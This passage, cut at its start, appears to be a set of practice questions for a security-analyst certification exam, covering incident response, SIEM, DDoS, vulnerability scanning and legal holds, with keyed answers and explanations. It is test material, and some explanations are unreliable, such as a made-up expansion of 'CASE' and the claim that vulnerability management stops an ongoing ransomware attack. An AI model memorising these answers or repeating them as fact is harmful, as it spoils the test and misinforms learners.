B. Implement MFA requirements for all internal resources
C. Harden systems by disabling or removing unnecessary services
D. Implement controls to block execution of untrusted applications
Correct Answer: C
To reduce the rate of success of adversary privilege escalation attempts, the most effective control would be C. Harden systems by disabling or removing unnecessary services. By minimizing the attack surface and limiting the number of running services, you can significantly reduce the opportunities for adversaries to exploit vulnerabilities or escalate privileges.
While the other options (A, B, and D) are important security measures, they do not directly address the specific threat of privilege escalation via native Windows tools. Here’s a brief overview of each option:
A. Set user account control protection to the most restrictive level on all devices: This helps prevent unauthorized changes to system settings, but it doesn’t specifically target privilege escalation via native tools.
B. Implement MFA requirements for all internal resources: Multi-factor authentication (MFA) enhances security, but it primarily focuses on user authentication rather than system hardening.
D. Implement controls to block execution of untrusted applications: While this is a good practice, it doesn’t directly address the use of native Windows tools for privilege escalation.
After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?
A. Irregular peer-to-peer communication
B. Rogue device on the network
C. Abnormal OS process behavior
D. Data exfiltration
Correct Answer: D
Based on the information provided, the most likely scenario is D. Data exfiltration. The consistent outbound emails to a non-company address at a specific time could indicate an attempt to transfer sensitive data from the organization. It’s essential to investigate further to confirm this suspicion and take appropriate action to prevent any potential data breaches.
A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?
A. Instruct the firewall engineer that a rule needs to be added to block this external server
B. Escalate the event to an incident and notify the SOC manager of the activity
C. Notify the incident response team that there is a DDoS attack occurring
D. Identify the IP/hostname for the requests and look at the related activity
Correct Answer: D
The next step for the SOC analyst would be to identify the IP/hostname for the requests and look at the related activity. This involves investigating the source of the HTTP/404 events to understand their origin and potential impact. By analyzing the IP addresses or hostnames associated with these events, the analyst can gain insights into whether this is a legitimate issue or a potential security threat. Once the source is identified, further actions can be taken as needed
Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system application, or user base is affected by an uptime availability outage?
A. Timeline
B. Evidence
C. Impact
D. Scope
Correct Answer: C
The reporting metric that should be utilized when measuring the degree to which a system, application, or user base is affected by an uptime availability outage is “Impact”. This metric assesses the severity and consequences of the outage on the affected components, users, or services. By understanding the impact, organizations can prioritize recovery efforts and allocate resources effectively. Remember, impact measurement considers both the extent and severity of the disruption caused by the outage.
A security analyst needs to provide evidence of regular vulnerability scanning on the company’s network for an auditing process. Which of the following is an example of a tool that can produce such evidence?
A. OpenVAS
B. Burp Suite
C. Nmap
D. Wiresharka
Correct Answer: A
OpenVAS (Open Vulnerability Assessment Scanner)
When it comes to vulnerability scanning tools, OpenVAS is an excellent choice for producing evidence of regular vulnerability scans.
It’s an open-source solution that assesses computers, networks, or applications for vulnerabilities and security weaknesses. By systematically scanning for these weaknesses, OpenVAS helps organizations understand their exposure to potential security threats and provides a pathway to remediate identified issues, thereby enhancing the security posture.
An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request?
A. Publicly disclose the request to other vendors
B. Notify the departments involved to preserve potentially relevant information
C. Establish a chain of custody starting with the attorney’s request
D. Back up the mailboxes on the server and provide the attorney with a copy
Correct Answer: B
Notifying the departments involved to preserve potentially relevant information is a crucial initial step.
By doing so, the organization ensures that relevant data is safeguarded before establishing a formal chain of custody.
Once the data is secured, the subsequent steps can focus on maintaining a clear and documented chain of custody in compliance with the legal hold request.
Which of the following best describes the actions taken by an organization after the resolution of an incident that addresses issues and reflects on the growth opportunities for future incidents?
A. Lessons learned
B. Scrum review
C. Root cause analysis
D. Regulatory compliance
Correct Answer: A
After the resolution of an incident, the organization engages in a process known as “lessons learned.” This involves reflecting on the incident, identifying areas for improvement, and capturing insights to enhance future incident response. By analyzing what went well and what could be done better, the organization grows and strengthens its incident management practices.
An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?
A. Impact
B. Vulnerability score
C. Mean time to detect
D. Isolation
Correct Answer: A
To move the incident forward, the analyst should focus on the “Impact.”
Understanding the severity and consequences of the events is crucial for prioritizing investigations and allocating resources effectively.
By assessing impact, the analyst can address critical issues promptly and manage the workload more efficiently.
To minimize the impact of a security incident, a cybersecurity analyst has configured audit settings in the organization’s cloud services. Which of the following security controls has the analyst configured?
A. Preventive
B. Corrective
C. Directive
D. Detective
Correct Answer: D
The security control that the analyst has configured by adjusting audit settings in the organization’s cloud services is “Detective.” These settings allow the organization to monitor and identify potential security incidents by collecting relevant logs and data. By detecting anomalies or suspicious activities, the organization can respond promptly and mitigate risks.
Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?
A. MOU
B. NDA
C. BIA
D. SLA
Correct Answer: D
The contract that defines the various levels of maintenance to be provided by an external business vendor in a secure environment is known as a Service Level Agreement (SLA). An SLA outlines the specific services, performance expectations, and responsibilities between the organization and the vendor. It ensures clarity regarding maintenance, uptime, and support levels, helping establish a strong working relationship.
A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?
A. Block the attacks using firewall rules
B. Deploy an IPS in the perimeter network
C. Roll out a CDN
D. Implement a load balancer
Correct Answer: B
Given the context of Layer 4 DDoS attacks, deploying an IPS (Option B) would be the most effective control. It can actively detect and block malicious traffic, providing better protection against such attacks:
A. Block the attacks using firewall rules (Option A): While firewalls can help filter traffic, they are not specifically designed to handle DDoS attacks efficiently. They might become overwhelmed during large-scale attacks.
B. Deploy an Intrusion Prevention System (IPS) in the perimeter network (Option B): An IPS can detect and block malicious traffic, including DDoS attacks. It’s a better choice than firewalls for this purpose.
C. Roll out a Content Delivery Network (CDN) (Option C): CDNs distribute content across multiple servers, reducing the impact of DDoS attacks by distributing the load. However, CDNs are more effective against Layer 7 attacks (application layer) rather than Layer 4 attacks.
D. Implement a load balancer (Option D): Load balancers distribute incoming traffic across multiple servers, preventing any single server from being overwhelmed. While they can help with DDoS attacks, they are more effective against Layer 7 attacks.
An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?
A. DLP
B. NAC
C. EDR
D. NIDS
Correct Answer: C
The best tool to deploy for data collection and aggregation from various endpoints is Endpoint Detection and Response (EDR).
EDR tools provide real-time monitoring and collection of endpoint data, allowing analysts to rapidly detect, investigate, and remediate threats. They collect large amounts of data from endpoint devices and use various data analytics techniques to identify patterns that indicate a threat. This makes EDR tools highly effective for security data aggregation.
Therefore, the correct answer is C. EDR.
A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best reason for developing the organization’s communication plans?
A. For the organization’s public relations department to have a standard notification
B. To ensure incidents are immediately reported to a regulatory agency
C. To automate the notification to customers who were impacted by the breach
D. To have approval from executive leadership on when communication should occur
Correct Answer: D
In regulated organizations, compliance with regulatory requirements is indeed crucial. However, the need for executive leadership approval in communication plans stems from several factors:
Coordination and Consistency: Having executive approval ensures that communication is consistent across all channels (internal, external, and public relations). It prevents conflicting messages and ensures a unified approach.
Risk Assessment: Executive leadership considers the potential impact of the breach, legal implications, and reputational risks. Their approval ensures that communication aligns with the organization’s risk tolerance.
Timeliness: While regulatory agencies provide guidelines, the specific timing of communication may vary based on the incident’s severity. Executive leadership can assess the situation and decide when to notify affected parties.
Legal and Financial Implications: Executive approval ensures that legal and financial considerations are addressed. For instance, notifying customers promptly may mitigate legal liabilities.
In summary, while regulatory agencies set guidelines, executive leadership plays a critical role in determining the timing and approach of communication during security incidents.
Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?
A. MFA
B. User and password
C. PAM
D. Key pair
Correct Answer: D
For downloading the configuration of cloud assets, the security analyst should use key pair authentication (option D).
This method provides strong security by using public and private keys to authenticate and establish a secure connection. It’s commonly used for secure access to cloud resources.
- MFA (option A) is an additional layer of security but isn’t directly related to asset configuration downloads.
- User and password (option B) and PAM (option C) are less secure for this purpose.
Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff members should take when they arrive?
A. Turn on all systems, scan for infection, and back up data to a USB storage device.
B. Identify and remove the software installed on the impacted systems in the department.
C. Explain that malware cannot truly be removed and then reimage the devices.
D. Log on to the impacted systems with an administrator account that has privileges to perform backups.
E. Segment the entire department from the network and review each computer offline.
Correct Answer: E
Given the situation, the first step the incident response staff members should take when they arrive is E. Segment the entire department from the network and review each computer offline.
Segmentation: Since the network is robustly segmented based on areas of responsibility, it’s crucial to isolate the affected department from the rest of the network. This prevents the malware from spreading further and affecting other systems.
Offline Review: By reviewing each computer offline (i.e., without network connectivity), the incident response team can assess the extent of the infection, identify compromised systems, and determine the nature of the malware. They can also collect evidence for further analysis.
The other options have potential issues:
- A: Turning on all systems and scanning for infection could inadvertently spread the malware.
- B: Identifying and removing software might not be effective if the malware is deeply embedded.
- C: Reimaging devices without understanding the malware’s behavior may not prevent reinfection.
- D: Logging in with an administrator account could expose the incident response team to risks.
A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the following must be considered to ensure the consultant does no harm to operations?
A. Employing Nmap Scripting Engine scanning techniques
B. Preserving the state of PLC ladder logic prior to scanning
C. Using passive instead of active vulnerability scans
D. Running scans during off-peak manufacturing hours
Correct Answer: C
To ensure the third-party consultant does no harm to operations while assessing the OT network, the following considerations should be taken into account:
Using passive instead of active vulnerability scans: Passive scans observe network traffic without actively probing or sending requests. This approach minimizes disruption to fragile and legacy equipment, reducing the risk of unintended consequences during the assessment.
Preserving the state of PLC ladder logic (Option B) is essential for maintaining operational stability, but it’s not directly related to the consultant’s scanning techniques. Similarly, running scans during off-peak hours (Option D) is a good practice, but it doesn’t specifically address the risk of harm. Employing Nmap Scripting Engine techniques (Option A) may be useful, but it’s not the primary consideration for avoiding harm to operations.
Therefore, the best choice is C. Using passive instead of active vulnerability scans. This approach allows assessment without disrupting critical systems.
A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notifications according to company policy. Which of the following technologies was deployed?
A. SIEM
B. SOAR
C. IPS
D. CERT
Correct Answer: A
The technology that best fits the description of correlating information from various sources, analyzing it, and triggering notifications based on company policy is Security Information and Event Management (SIEM).
SIEM systems collect and correlate data from network sensors, application logs, and host logs to detect security incidents and provide alerts. They play a crucial role in monitoring and managing security events within an organization.
A. SIEM is the correct answer.
B. SOAR (Security Orchestration, Automation, and Response) focuses on automating incident response processes but doesn’t necessarily correlate information from various sources.
C. IPS (Intrusion Prevention System) is designed to prevent and block malicious network traffic but doesn’t handle information correlation.
D. CERT (Computer Emergency Response Team) is an incident response team within an organization, not a technology for correlating information.
Which of following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?
A. Install a firewall.
B. Implement vulnerability management.
C. Deploy sandboxing.
D. Update the application blocklist.
Correct Answer: B
To mitigate the effects of a new ransomware attack that bypassed the company antivirus, implementing vulnerability management would be the most effective approach.
Firewall (Option A): Firewalls control network traffic based on predefined rules. While they are essential for network security, they primarily focus on filtering incoming and outgoing traffic. They won’t directly address an ongoing ransomware attack that has already infiltrated the network.
Vulnerability Management (Option B): This approach involves identifying and addressing vulnerabilities in software, systems, and applications. By regularly scanning for vulnerabilities, applying patches, and updating software, you can reduce the attack surface and prevent exploitation by ransomware.
Sandboxing (Option C): Sandboxing isolates suspicious files or processes in a controlled environment to analyze their behavior. While it’s useful for detecting malware, it’s not a direct mitigation strategy for an ongoing attack.
Application Blocklist (Option D): Maintaining an application blocklist helps prevent unauthorized or malicious software from running. However, it won’t stop an active ransomware attack that has already infiltrated the system.
In summary, vulnerability management is the most relevant and proactive measure to address an ongoing ransomware attack. It focuses on identifying and fixing vulnerabilities, reducing the risk of successful exploitation.
A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnerabilities, including SQL injection, RFI, XSS, etc. Which of the following would most likely meet the requirement?
A. Reverse engineering
B. Known environment testing
C. Dynamic application security testing
D. Code debugging
Correct Answer: C
For identifying vulnerabilities, including SQL injection, RFI, and XSS, the most suitable approach would be dynamic application security testing (DAST).
DAST involves scanning applications in their running state to identify security flaws and vulnerabilities. It checks for issues like input validation errors, insecure configurations, and common attack vectors. By actively probing the application, DAST helps discover vulnerabilities that could be exploited by attackers. Other options like reverse engineering, known environment testing, and code debugging are not specifically designed for vulnerability identification in the same way as DAST1. So, I recommend choosing option C: Dynamic application security testing.
After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASE to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?
A. SIEM ingestion logs are reduced by 20%.
B. Phishing alerts drop by 20%.
C. False positive rates drop to 20%.
D. The MTTR decreases by 20%.
Correct Answer: C
The integration of Data Loss Prevention (DLP) and Cybersecurity Analytics and Security Event (CASE) tools aims to enhance security operations and reduce alert fatigue. Let’s break down the options:
A. SIEM ingestion logs are reduced by 20%: While this could be a positive outcome, it’s not directly related to reducing alert fatigue.
B. Phishing alerts drop by 20%: This is a specific improvement related to threat detection and could contribute to reducing alert fatigue. However, it’s not the best possible outcome.
C. False positive rates drop to 20%: This is a strong contender. Lowering false positives means analysts spend less time investigating non-threatening alerts, which directly addresses alert fatigue.
D. The MTTR (Mean Time to Respond) decreases by 20%: While reducing response time is valuable, it doesn’t directly address alert fatigue.
The most relevant outcome is C. False positive rates drop to 20%. By minimizing false positives, analysts can focus on genuine threats, leading to more efficient and effective incident response
Which of the following threat actors is most likely to target a company due to its questionable environmental policies?
A. Hacktivist
B. Organized crime
C. Nation-state
D. Lone wolf
Correct Answer: A
The threat actor most likely to target a company due to its questionable environmental policies is A. Hacktivist.
Hacktivists are motivated by social or political causes and may engage in cyberattacks to promote their agenda or protest against specific policies or practices. In this case, environmental policies would be a relevant target for hacktivist activity.
A cybersecurity analyst is recording the following details:
ID
Name
Description
Classification of information
Responsible party
In which of the following documents is the analyst recording this information?
A. Risk register
B. Change control documentation
C. Incident response playbook
D. Incident response plan
Correct Answer: A
A risk register is a document used to record information about identified risks within an organization. It typically includes details such as the risk ID, risk name, description of the risk, classification of the risk (e.g., impact and likelihood), and the responsible party for managing or mitigating the risk. Recording this information in a risk register helps organizations systematically manage and prioritize risks to their assets and operations.
A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurred by an issue?
A. Trends
B. Risk score
C. Mitigation
D. Prioritization
Correct Answer: B
The best solution to identify potential loss incurred by an issue in a reporting process for vulnerability management would be Risk score.
A risk score helps quantify the impact and likelihood of a vulnerability, allowing the SOC manager to prioritize remediation efforts effectively.
While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be checked first?
A. If appropriate logging levels are set
B. NTP configuration on each system
C. Behavioral correlation settings
D. Data normalization rules
Correct Answer: D
In the context of a SIEM setup, data normalization rules are crucial for standardizing and correlating data from various sources.
These rules allow the SIEM to accurately identify patterns and anomalies across different systems. So, while NTP configuration is essential, addressing data normalization rules should be the initial step for effective incident correlation
During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability?
A. The risk would not change because network firewalls are in use
B. The risk would decrease because RDP is blocked by the firewall
C. The risk would decrease because a web application firewall is in place
D. The risk would increase because the host is external facing
Correct Answer: D
Considering the context, Option D is the most appropriate choice. The risk would increase because the host is externally facing, and the vulnerability over port 3389 poses a significant threat.
A. The risk would not change because network firewalls are in use:
This option doesn’t directly address the vulnerability identified over port 3389.
Network firewalls may not specifically mitigate the vulnerability associated with port 3389.
B. The risk would decrease because RDP is blocked by the firewall:
This option suggests that blocking Remote Desktop Protocol (RDP) would reduce the risk.
However, the vulnerability was identified over port 3389, which is commonly used for RDP.
Blocking RDP might mitigate the specific vulnerability but doesn’t necessarily address other potential risks.
C. The risk would decrease because a web application firewall is in place:
A web application firewall (WAF) is designed to protect web applications from attacks.
While it’s beneficial for web-related vulnerabilities, it may not directly address vulnerabilities over port 3389.
Therefore, this option is less likely to significantly reduce the overall risk associated with the vulnerability.
D. The risk would increase because the host is external facing:
This option acknowledges that the web server is externally accessible.
External-facing servers are more exposed to threats, increasing the overall risk.
The vulnerability identified over port 3389 adds to this risk.
Therefore, this option aligns with the potential impact of the vulnerability.
Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Choose two.)
A. Performing dynamic application security testing
B. Reviewing the code
C. Fuzzing the application
D. Debugging the code
E. Implementing a coding standard
F. Implementing IDS
Correct Answer: B, D
Reviewing the Code (Option B):
- Developers should carefully examine the code to identify any logical or syntactical errors. This involves analyzing the code line by line, checking for inconsistencies, missing semicolons, incorrect variable assignments, and other issues.
- By reviewing the code thoroughly, developers can catch errors early in the development process and ensure that the code adheres to best practices.
Debugging the Code (Option D):
- Debugging involves identifying and fixing errors in the code. Developers use debugging tools (such as breakpoints, logging, or step-by-step execution) to trace the flow of the program and pinpoint the exact location of errors.
- Debugging helps identify issues related to incorrect data, unexpected behavior, or exceptions during runtime.
Common debugging techniques include using print statements, analyzing stack traces, and using integrated development environments (IDEs) with debugging features.
While other options (such as dynamic application security testing, fuzzing, implementing a coding standard, and implementing intrusion detection systems) are valuable for security and quality assurance, they do not directly address runtime errors in the code. Therefore, options B (Reviewing the code) and D (Debugging the code) are the most relevant for resolving this issue.
A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls and two-factor authentication. Which of the following does this most likely describe?
A. System hardening
B. Hybrid network architecture
C. Continuous authorization
D. Secure access service edge
Correct Answer: A
The actions described—implementing host-based IPS (Intrusion Prevention Systems), firewalls, and two-factor authentication—are measures to protect and secure a computer system from vulnerabilities and unauthorized access.
These measures are most likely related to System hardening. System hardening involves implementing security measures to reduce the potential attack surface of a system, which is consistent with the deployment of the security controls mentioned.
A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?
A. Offline storage
B. Evidence collection
C. Integrity validation
D. Legal hold
Correct Answer: C
This process typically involves using cryptographic hashes to verify that the data has not been altered, ensuring its authenticity and integrity. Offline storage, evidence collection, and legal hold are also important aspects of handling digital evidence, but integrity validation is key to preventing repudiation.
A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?
A. The NTP server is not configured on the host
B. The cybersecurity analyst is looking at the wrong information
C. The firewall is using UTC time
D. The host with the logs is offline
Correct Answer: A
Given the scenario, the most likely explanation for the discrepancy in time stamps is:
A. The NTP server is not configured on the host
This is because a 43-minute difference suggests a significant time drift, which is often due to the host not being synchronized with a Network Time Protocol (NTP) server. Proper NTP configuration ensures that all devices on the network have synchronized time, which is crucial for accurate log correlation and incident analysis.
A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?
A. Scan the employee’s computer with virus and malware tools
B. Review the actions taken by the employee and the email related to the event
C. Contact human resources and recommend the termination of the employee
D. Assign security awareness training to the employee involved in the incident
Correct Answer: B
One of the first actions the incident response team should take when they receive notification of a phishing attack is to review the actions taken by the employee and the email related to the event (Option B).
This step is crucial for understanding the scope of the incident, identifying any potential security breaches, and gathering evidence for further investigation.
